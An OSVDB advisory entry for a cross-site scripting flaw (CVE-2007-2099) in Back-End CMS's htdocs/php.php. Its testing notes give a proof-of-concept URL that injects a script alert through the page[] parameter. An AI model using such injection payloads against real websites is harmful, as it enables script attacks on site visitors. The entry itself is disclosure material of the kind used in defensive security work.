Back-End CMS htdocs/php.php page[] Variable XSS

2007-04-14T15:16:01
ID OSVDB:34143
Type osvdb
Reporter OSVDB
Modified 2007-04-14T15:16:01

Description

Manual Testing Notes

http://[target]/[path]/htdocs/php.php?page[]=<script>alert(/the_Edit0r/);</script>

References:

Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0218.html ISS X-Force ID: 33685 CVE-2007-2099